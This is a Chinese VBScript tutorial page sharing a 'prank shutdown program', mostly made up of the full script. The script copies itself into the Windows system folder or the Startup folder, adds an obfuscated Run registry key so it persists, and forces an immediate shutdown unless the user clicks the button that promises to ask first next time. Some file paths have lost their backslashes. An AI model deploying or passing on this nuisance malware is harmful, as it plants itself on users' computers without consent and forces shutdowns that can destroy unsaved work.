vb下的恶搞关机程序_vbs教程-查字典教程网
vb下的恶搞关机程序
vb下的恶搞关机程序
发布时间:2016-12-28 来源:查字典编辑
摘要:额,不多介绍了,能看懂的就拿走,看不懂的拿走也没用。复制代码代码如下:Dimfs,dirwin,c,Wll,str,strr,rSetfs=...

额,不多介绍了,能看懂的就拿走,看不懂的拿走也没用。

复制代码 代码如下:

Dim fs, dirwin, c,Wll, str,strr,r

Set fs = CreateObject("Scripting.FileSystemObject")

Set dirwin = fs.GetSpecialFolder(1)

Set Wll = WScript.CreateObject("WScript.Shell")

Set c = fs.GetFile(WScript.ScriptFullName)

str ="HK"&"LMSOFT"&"WAREMicr"&"osoftWin"&"dowsCurren"&"tVersionR"&"unwxb"

if (fs.FileExists(dirwin&"wxb.vbs")) Then

call Show_And_Do("reg")

elseif (fs.FileExists("C:Documents and SettingsAll UsersStart MenuProgramsStartupwxb.vbs")) Then

call Show_And_Do("Startup")

else

On Error Resume Next

strr=""

Wll.RegWrite str, "C:WINDOWSsystem32wxb.vbs", "REG_SZ"

strr=Wll.Regread (str)

if strr="" then

c.Copy("C:Documents and SettingsAll UsersStart MenuProgramsStartupwxb.vbs")

else

c.Copy(dirwin&"wxb.vbs")

end if

end if

sub Show_And_Do(s)

dim f

r = MsgBox ("警告:请不要随便动我的电脑! " & Chr(13) & Chr(10) & "确定->下次一定会先征求同意的" & Chr(10) & "取消->爱咋滴咋地,我才不管他嘞!", 4145, "MsgBox Example")

If r = 1 Then

if s="Startup" then

set f = fs.GetFile("C:Documents and SettingsAll UsersStart MenuProgramsStartupwxb.vbs")

f.Delete()

elseif s="reg" then

Wll.RegDelete str

set f = fs.GetFile(dirwin&"wxb.vbs")

f.Delete()

end if

Else

wll.run "Shutdown.exe -s -f -t 0"

End If

end sub

好了,代码分享给大家了,不要随便拿去搞破坏!

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新vbs学习
    热门vbs学习
    脚本专栏子分类